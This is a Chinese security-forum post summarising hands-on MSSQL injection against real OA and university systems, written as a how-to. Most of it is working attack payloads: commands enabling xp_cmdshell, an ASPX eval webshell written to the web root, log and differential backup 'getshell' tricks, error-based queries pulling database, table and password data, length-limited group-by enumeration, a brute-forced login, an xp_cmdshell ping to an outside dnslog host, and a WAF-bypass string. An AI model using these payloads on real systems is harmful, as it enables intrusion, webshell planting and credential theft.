安全矩阵

 找回密码
 立即注册
搜索
查看: 2459|回复: 0

经验分享 | mssql注入实战总结之狠快准绕

[复制链接]

855

主题

862

帖子

2940

积分

金牌会员

Rank: 6Rank: 6

积分
2940
发表于 2021-6-15 09:48:46 | 显示全部楼层 |阅读模式
原文链接:经验分享 | mssql注入实战总结之狠快准绕
实战一
这是一次挖到一个小OA系统的通用管理员弱口令,后台可以执行sql语句并且是sa权限,这运气没谁了哈哈
但可以去edu刷分的大部分目标xp_cmdshell却废了.只能恰个弱口令…….


先说可以xp_cmdshell部分:
xp_cmdshell写shell技巧:
条件:sa权限,
常见问题:xp_cmdshell存储过程在 SQL Server 2005以后默认关闭,需要手动开启

#开启方法

     execute(‘sp_configure “show advanced options”,1’)  #将该选项的值设置为1
     execute(‘reconfigure’)                             #保存设置
     execute(‘sp_configure “xp_cmdshell”, 1’)           #将xp_cmdshell的值设置为1
     execute(‘reconfigure’)                             #保存设置
     execute(‘sp_configure’)                            #查看配置
     execute(‘xp_cmdshell “whoami”‘)                    #执行系统命令
或者

     exec sp_configure ‘show advanced options’,1;      
     reconfigure;                                      
     exec sp_configure ‘xp_cmdshell’,1;                 
     reconfigure;                                    
     exec sp_configure;                                
     exec xp_cmdshell ‘whoami’;  
     exec master ..xp_cmdshell “ping dnslog”
上面执行开启命令后,执行一下  whoami     ,system  权限,直接起飞!

写shell技巧:
#先找网站根路径:
exec xp_cmdshell ‘where /r d:\ *.aspx’;直接写入aspx文件同目录却访问不了,麻了!
问了一下tari师兄,他说:估计做了和springboot类似的路由映射,但静态文件的目录可能不会走路由.    访问路径如下

故再找根路径下绝对静态可解析路径:
exec xp_cmdshell ‘where /r D:\OA *.jpg’;
写shell,这里也需要注意一点,dos对尖括号<>会报错,所以需要用^转义一下,或者
echo "一句话" > hack.aspx 用双引号
echo ^<^%@ Page Language=”Jscript”%^>^<^%eval(Request.Item[“y”],”unsafe”);%^>^ >d:\xx\xx.aspx然后倚天大剑(蚁剑)连接http://x.x.x.x/login/login/xx.aspx即可.
其它gethell大全:(看偶像柯大佬的总结
剩下不可以xp_cmdshell的,但其它大多getshell方法(这里可以看柯大佬的珂技知识分享的总结),都没法用.
其它大多方法前提条件都是:SQL Server 2008不可用,SQL Server 2000可用
因为我这版本是SQL Server 2008不可用,吐了~~于是只好备份getshell
备份getshell至少DBO权限)
log备份(推荐):
优势:
1、重复性好,多次备份的成功率高
2、相对于差异备份而言,shell的体积较小
利用条件:
1、前提得知绝对路径,并且可写
2、站库不分离
3、数据库必须被备份过一次
;alter database 库名 set RECOVERY FULL--  ;create table 数据库名..表名(a image)--     //建表;insert into 数据库名..表名(a) values (0x一句话木马)--     //插入一句话木马到表中,注意16进制 ;backup database 数据库名 to disk = 'c:\www\panda.bak'--          //先手动给数据库备份一遍 ;backup log 数据库名 to disk = 'c:\www\panda.asp' with init-- //利用log备份到web路径getshell

差异备份的条件:
1、前提知道绝对路径,路径可写。
2、HTTP 500错误不是自定义
3、WEB和数据在一块。还有的就是数据库中不能存在%号之类的,不然也是不成功的。
4、数据量不能太大
;backup database 库名 to disk = ‘c:\bak.bak’ ;–-    //先手动备份一次;create table 数据库名..表名(a image)–-     //建立表,加字段;insert into 数据库名..表名(a) values (0x一句话木马)–-     //插入一句话木马到表中,注意16进制;backup database 库名 to disk = ‘c:\shell.asp’ with differential , format ;-- //进行差异备份
小结:
备份getshell这一般对php和asp有用,注意asp备份生成的文件经常有没有闭合的问题,但aspx我暂时没找到成功例子
我这是aspx的2种备份都试了,但因为备份后会插入多个shell如下

导致:<%@ Page Language=xx  %>出现多次,报错:只能有一个page指令   试了闭合和其它方法不行,如有大佬成了,可指教一下,小弟将不胜感激!


实战二mssql报错注入很方便,但柯大佬也没完善总结,我试了几种方法,这里快速报错最快,且在之后的手工注入很实用


注册一个账号但要审核,如上图消息里得到账号规律,对后4位数爆破,成功     00xxxxx   123456
然后登录后台,在某处发现sql注入:
Users/xx.ashx?ID=00') and 1=1 --+
//闭合成功

') and 1=convert(int,user_name()) --+
#查当前数据库用户,结果不是sa
1')/**/;/**/exec/**/master ..xp_cmdshell /**/ "ping  xx.dnslog.cn" --+
#不死心,执行一下cmdshell

但权限果然不够
# 1.查其它数据库名 ,如下图:直接和联合查询差不多,快
') and 1=convert(int,stuff((select quotename(name) from sys.databases for xml path('')),1,0,''))--+

#2.查指定数据库下的表
') and 1=convert(int,stuff((select  quotename(name) from 数据库名.sys.objects where type='U' for xml path('')),1,0,''))--+

#3.查指定表字段
  1. ') and 1=convert(int,stuff((select quotename(name) from 数据库名.sys.columns where object_id=object_id('表名') for xml path('')),1,0,''))--+
复制代码


#4.查指定数据
    #查username
  1. ') and 1=convert(int,stuff((select quotename(USNM) from 表  for xml path('')),1,0,''))--+
复制代码


    #查admin的password
  1. ') and 1=convert(int,stuff((select quotename(PSWD) from T_USER where USNM='admin' for xml path('')),1,0,''))--+
复制代码



实战三
最近十二师傅给了个mssql的sql注入, 用户名处可注入 ,但这sql注入很烦…验证码刷新无法绕过

而且还前端加密………..

单引号报错,闭合 1’/**/and/**/1=1--+    ,立马用上面的快速报错大法:
#1.查当前用户名:(非sa)
  1. 1'/**/and/**/1=convert(int,user_name()) --+
复制代码


#mssql默认支持叠堆注入,但没有权限xp_cmdshell
  1. 1'/**/;/**/exec/**/master ..xp_cmdshell /**/"ping xx.dnslog.cn"–+
复制代码



#查其它数据库名
  1. 1'/**/and/**/1=convert(int,stuff((select quotename(name) from sys.databases for xml path('')),1,0,''))--+
复制代码




#查指定数据库下的表
  1. 1'/**/and/**/1=convert(int,stuff((select  quotename(name) from 数据库名.sys.objects where type=’U’ for xml path('')),1,0,''))--+
复制代码


可惜好景不长………payload没用了猜测长度限制了,输了n个无害的111111111111…..也是如下这样  “非法登录”

最后发现限制了长度为100,这TM玩ctf麽?  细心的会发现快速报错大法和其他常见的长度都超了100  
这里是登录处故可以用以下查:
#当前表名和列名


嘿嘿得到 表名:Users 列:nid
拼接类似如下,只能得到当前sql语句里的表和列


继续使用上一个所得到的值 Users.nid来递归获取所有的名  

  1. ' group by Users.nid having 1=1--
复制代码


  #得到Users.sysuserId继续使用上2个,递归获取
  1. ' group by Users.nid,Users.sysuserId having 1=1--
复制代码


   #…..多个递归,最后得到Users.UserPwd  和Users.UserName  再不出来就超100长度了emmm
  1. ' group by Users.nid,Users.sysuserId,Users.RoleId,Users.RoleType,Users.UserName having 1=1--
复制代码


#查字段内容

  1. <code>1' and 1=(select top 1 UserName from Users) --</code><code>
  2. 1' and 1=(select top 1 UserPwd from Users) --</code>
复制代码


得到账号test,加密的密码,md5查不出,估计加盐了

不死心查第二个,用上个递归,得到test1
#递归查账号
  1. 1' and 1=(select top 1 UserName from Users where UserName!='test')--
复制代码


#查test1密码
  1. 1' and 1=(select top 1 UserPwd from Users where UserName='test1')--
复制代码



最后麻了密码居然和上个账号test一样
然后盲猜有admin账号
  1. 1' and 1=(select top 1 UserPwd from Users where UserName='admin')--
复制代码


发现得出的密码不一样,但MD5还是解不出


绕–绕福某大学安全狗
这次是FengXone师傅给的福某大学sql注入,感谢FengXone老表,但有waf为安全狗

登录后台某处有sql注入,
逐个字符fuzz了一波得到 payload:
  1. ID=1%1eor%1e1%3ddb_name ()%1e--
复制代码




数据库名:xxx      因为挖src不像攻防演练,注出库就可以上报了,主要还是菜…..
然后fuzz是得到payload:
  1. ID=1%20or%201=1--
复制代码


居然可以爆出大量敏感信息 666




回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-11-29 07:54 , Processed in 0.014026 second(s), 18 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表